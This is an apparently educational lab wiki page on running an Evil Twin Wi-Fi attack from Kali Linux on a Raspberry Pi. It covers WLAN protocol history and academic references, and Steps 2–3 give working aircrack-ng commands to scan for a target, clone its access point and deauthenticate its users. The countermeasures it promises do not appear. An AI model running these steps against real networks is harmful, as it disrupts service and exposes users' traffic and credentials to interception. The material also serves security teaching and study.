Evil Twin Attack on Raspberry Pi

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Summary

This article outlines the Evil Twin Attack via Kali on Raspberry Pi. The Evil Twin Attack is a specific type of Man-in-the-Middle (MITM) attack that exploits the trust users have in legitimate Wi-Fi networks. The attacker creates a rogue access point (AP) that mimics the SSID (network name) and MAC address of a legitimate AP. Devices that automatically connect to known networks may unknowingly connect to the rogue AP. This allows the attacker to intercept, modify, and steal sensitive data transmitted by the victim. The attack can lead to credential theft, session hijacking, and even the distribution of malware.

Evil Twin Attacks often occur in locations with public Wi-Fi networks, such as cafés, airports, hotels, shopping malls, and libraries. These locations have open or semi-open networks that make it easier for attackers to clone access points without raising suspicion.

A Raspberry Pi, due to its size and affordability, is often used in such attacks, especially when paired with the network penetration tools included in Kali Linux. With software like airmon-ng, airodump-ng, airbase-ng, and aireplay-ng, attackers can scan networks, create rogue APs, and force devices to connect to them. This document provides a step-by-step guide on how to execute an Evil Twin Attack and highlights essential countermeasures to mitigate this threat.

Requirements

  • Operating system: Kali Linux ARM version
  • Packages: airmon-ng, airodump-ng, aireplay-ng, tcpdump,
 Wireshark
  • Hardware: Raspberry Pi 4 (Model B),
 * 2x Alfa AWUS036 ACH Wide Range AC1200 Wireless Adapter,
 * SD-Card
 * (Ethernet cable)
 * Raspberry Pi Powersource


In order to complete these steps, you must have followed Setting up Kali Linux on Raspberry Pi before.

WLAN Security

  • WEP (Wired Equivalent Privacy): Introduced in 1997, WEP uses the RC4-algorithm, but it has critical flaws such as weak key management and the re-use of initialization vectors (IVs), making it vulnerable to attacks like packet sniffing and brute-force attacks.
  • WPA (Wi-Fi Protected Access): Launched in 2003 as a temporary replacement for WEP, WPA introduced stronger encryption through the use of the Temporal Key Integrity Protocol (TKIP) and a 4-way handshake to manage session keys. However, it remained susceptible to attacks, especially if weak passwords were used.
  • WPA2: Released in 2004, WPA2 replaced TKIP with the more secure Advanced Encryption Standard (AES). It introduced the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), which provides stronger data integrity. However, vulnerabilities like the KRACK attack have exposed some flaws.
  • WPA3: Introduced in 2018, WPA3 aims to address the weaknesses of WPA2. It includes Simultaneous Authentication of Equals (SAE), which replaces pre-shared keys with a more secure handshake method. WPA3 also provides forward secrecy and improved protection against dictionary attacks.

Description

Step 1: The Environment

1. Download and install Kali Linux Arm version on an SD card: https://kali.download/arm-images/kali-2024.4/kali-linux-2024.4-raspberry-pi-armhf.img.xz

2. Insert the SD card into the Raspberry Pi and boot it. The username and password is "kali".

3. Connect to the Raspberry Pi headless via SSH or directly by using a monitor and keyboard.

4. Install Required Packages: 

 sudo apt-get update
 sudo apt-get install aircrack-ng wireshark tcpdump

Step 2: Identifying the Target Network

1. Enable monitor mode on the Wi-Fi adapter using the command: 

 airmon-ng start wlan0

2. Scan for nearby networks with: 

 airodump-ng wlan0mon

3. Write the SSID, BSSID (MAC address) and the Channel of the target network down.

Step 3: Launch the Evil Twin Attack

1. Create a fake access point using the command: 

 airbase-ng -e "<SSID>" -c <channel> wlan0mon

2. Use aireplay-ng to deauthenticate users from the legitimate AP: 

  aireplay-ng --deauth 10 -a <MAC addresss> wlan0mon

3. Capture data using Wireshark or tcpdump to analyze traffic going through the rouge AP

Used Hardware

Raspberry Pi 4 Alfa AWUS036 ACH Wide Range AC1200 Wireless Adapter


References

  • ArashHabibiLashkari, Mir MohammadSeyedDanesh, and Behrang Samadi. A survey on wireless security protocols (wep, wpa and wpa2/802.11i). In 2009 2nd IEEE International Conference on Computer Science and Information Technology, pages 48–52, 2009
  • Nissy Sombatruang, Youki Kadobayashi, M. Angela Sasse, Michelle Baddeley, and Daisuke Miyamoto. The continued risks of unsecured public wi-fi and why users keep using it: Evidence from japan. In 2018 16th Annual Conference on Privacy, Security and Trust (PST), pages 1–11, 2018.
  • Yimin Song, Chao Yang, and Guofei Gu. Who is peeping at your passwords at starbucks? — to catch an evil twin access point. In 2010 IEEE/IFIP International Conference on Dependable Systems Networks (DSN), pages 323–332, 2010
  • Abu Taha Zamani and Javed Ahmad. Ieee 802.11 wireless lan: Security risks. 2:114–122, 02 2014
Retrieved from "https://wiki.elvis.science/index.php?title=Evil_Twin_Attack_on_Raspberry_Pi&oldid=17477"